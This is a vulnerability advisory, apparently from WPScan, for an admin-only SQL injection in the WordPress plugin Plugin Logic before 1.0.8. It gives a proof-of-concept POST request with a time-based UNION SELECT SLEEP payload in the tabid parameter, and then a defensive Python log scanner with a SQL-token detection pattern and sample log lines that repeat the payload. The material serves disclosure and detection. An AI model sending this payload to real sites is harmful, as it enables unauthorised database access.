wpexploit | Kunal Sharma | WPEX-ID: BDE93D90-1178-4D55-AEA9-E02C4F8BCAA2
History: Dec 02, 2022 - 12:00 a.m.

Plugin Logic < 1.0.8 - Admin+ SQLi

Tags: plugin logic, admin, sql injection, vulnerability, version, exploit, post request, cookie, content type

EPSS: 0.001 (Percentile: 43.3%)

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin. The proof-of-concept request below injects through the tabid query parameter of the plugin's settings page; versions 1.0.8 and later are not affected.

POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Cookie: [admin+]

plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes
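As an added example that is not part of this advisory or of the plugin's own code: a small Python scanner a defender can run over web-server access logs to flag requests that carry SQL syntax in the tabid parameter of the Plugin Logic settings page, which is the parameter exercised in the request above. The combined-log format, the sample log lines and the token list are constructed for this example; the durable fix remains updating the plugin to 1.0.8 or later.

```python
"""Flag SQL-injection probes against the Plugin Logic settings page (tabid parameter).

Example code added to the advisory record; log format and sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Paths on which the plugin renders its settings tabs (the network path is the one
# in the advisory's PoC; the single-site path is an assumption for this example).
PLUGIN_PAGES = ("/wp-admin/network/plugins.php", "/wp-admin/plugins.php")

# Tokens that never belong in a legitimate tab identifier (constructed list).
SQL_TOKEN_RE = re.compile(
    r"\b(union|select|sleep|benchmark)\b|['\"#;]|--|/\*", re.IGNORECASE
)

# Apache/nginx "combined" format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_tabid(target):
    """Return the decoded tabid value if it looks like an injection attempt, else None."""
    parts = urlsplit(target)
    if parts.path not in PLUGIN_PAGES:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("page", [""])[0] != "plugin-logic":
        return None
    for value in qs.get("tabid", []):
        # parse_qs has already decoded once; a second pass catches double-encoded payloads
        decoded = unquote_plus(value)
        if SQL_TOKEN_RE.search(decoded):
            return decoded
    return None


def scan_log(lines):
    """Return (client_ip, decoded_tabid) for every log line that carries a suspicious tabid."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = suspicious_tabid(m.group("target"))
        if found is not None:
            hits.append((m.group("ip"), found))
    return hits


# Constructed sample: one benign settings view, one request mirroring the PoC above,
# and one injection-looking request against a different admin page (out of scope here).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Dec/2022:10:15:01 +0000] "GET /wp-admin/network/plugins.php'
    '?page=plugin-logic&tabid=options HTTP/1.1" 200 5120',
    '10.0.0.9 - - [02/Dec/2022:10:16:44 +0000] "POST /wp-admin/network/plugins.php'
    '?page=plugin-logic&tabid=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [02/Dec/2022:10:17:02 +0000] "GET /wp-admin/plugins.php'
    '?page=other&tabid=1%20union%20select%201 HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for ip, payload in scan_log(SAMPLE_LOG):
        print(f"{ip}: suspicious tabid {payload!r}")
```

Because the injection is only reachable by an authenticated administrator, a hit from this scanner points at either a compromised admin session or an administrator probing their own site; correlate the client IP and cookie with the admin login history before treating it as an incident.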
